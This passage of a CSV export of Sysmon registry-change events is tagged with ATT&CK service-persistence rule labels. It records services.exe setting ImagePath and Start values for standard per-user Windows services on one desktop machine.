12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 12:49:54.099",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.117042700Z"",""eventRecordID"":""580"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.051",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.116201300Z"",""eventRecordID"":""579"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 12:49:53.951",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.115976300Z"",""eventRecordID"":""578"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:53.921",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.115016200Z"",""eventRecordID"":""577"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:49:53.913",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.114809100Z"",""eventRecordID"":""576"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:53.891",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.113971900Z"",""eventRecordID"":""575"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:53.877",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.113414400Z"",""eventRecordID"":""574"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3eb7b\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:49:53.863",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.112237300Z"",""eventRecordID"":""573"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 12:49:53.838",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.111740900Z"",""eventRecordID"":""572"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:53.819",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.108383500Z"",""eventRecordID"":""571"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 12:49:53.764",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.108011700Z"",""eventRecordID"":""570"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:52.224",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.075480200Z"",""eventRecordID"":""569"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 12:49:52.161",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.075237900Z"",""eventRecordID"":""568"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:52.108",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.074355000Z"",""eventRecordID"":""567"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 12:49:51.878",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.074132100Z"",""eventRecordID"":""566"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:51.695",9,"ATT&CK T1058:Registry edit for new 
